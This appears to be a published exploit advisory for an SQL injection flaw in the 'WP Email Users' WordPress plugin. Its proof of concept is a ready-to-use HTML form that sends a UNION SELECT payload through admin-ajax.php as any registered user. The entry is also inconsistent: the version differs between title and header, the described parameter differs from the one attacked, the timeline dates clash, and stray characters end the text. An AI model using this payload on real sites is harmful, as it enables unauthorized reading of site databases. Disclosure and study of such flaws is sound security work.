# Exploit Title:WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/wp-email-users/ # Software Link: https://wordpress.org/plugins/wp-email-users/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 1.3.1 # Tested on: Ubuntu 14.04 1 - Description: Type user access:is accessible for any registered user $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/ 2 - Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: <form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post"> <input type="text" name="action" value="weu_my_action"> <input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHEREterm_id=1"> <input type="text" name="temp_sel_key" value="select_temp"> <input type="submit" name=""> </form> 3 - Timeline: 12/01/2016 – Discovered 13/12/2016 – Vendor not finded
体验盒子
